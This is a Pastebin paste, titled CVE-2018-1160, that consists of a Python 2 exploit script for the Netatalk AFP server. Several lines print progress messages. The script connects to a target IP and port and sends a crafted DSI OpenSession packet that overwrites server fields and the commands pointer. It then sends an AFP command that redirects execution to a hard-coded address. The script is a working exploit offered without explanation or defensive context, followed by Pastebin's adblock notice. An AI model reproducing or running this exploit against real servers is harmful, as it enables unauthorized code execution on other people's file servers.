yadav2152003s

CVE-2018-1160

Apr 29th, 2021
601
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2. import struct
  3. import sys
  4. if len(sys.argv) != 3:
  5.     sys.exit(0)
  6. ip = sys.argv[1]
  7. port = int(sys.argv[2])
  8. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
  10. sock.connect((ip, port))
  11. dsi_payload = "\x00\x00\x40\x00" # client quantum
  12. dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
  13. dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
  14. dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
  15. dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
  16. dsi_opensession = "\x01" # attention quantum option
  17. dsi_opensession += struct.pack("B", len(dsi_payload)) # length
  18. dsi_opensession += dsi_payload
  19. dsi_header = "\x00" # "request" flag
  20. dsi_header += "\x04" # open session command
  21. dsi_header += "\x00\x01" # request id
  22. dsi_header += "\x00\x00\x00\x00" # data offset
  23. dsi_header += struct.pack(">I", len(dsi_opensession))
  24. dsi_header += "\x00\x00\x00\x00" # reserved
  25. dsi_header += dsi_opensession
  26. sock.sendall(dsi_header)
  27. resp = sock.recv(1024)
  28. print "[+] Open Session complete"
  29. afp_command = "\x01" # invoke the second entry in the table
  30. afp_command += "\x00" # protocol defined padding
  31. afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
  32. afp_command += struct.pack("Q", 0x4295f0) # address to jump to
  33. dsi_header = "\x00" # "request" flag
  34. dsi_header += "\x02" # "AFP" command
  35. dsi_header += "\x00\x02" # request id
  36. dsi_header += "\x00\x00\x00\x00" # data offset
  37. dsi_header += struct.pack(">I", len(afp_command))
  38. dsi_header += '\x00\x00\x00\x00' # reserved
  39. dsi_header += afp_command
  40. print "[+] Sending get server info request"
  41. sock.sendall(dsi_header)
  42. resp = sock.recv(1024)
  43. print resp
  44. print "[+] Fin."
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×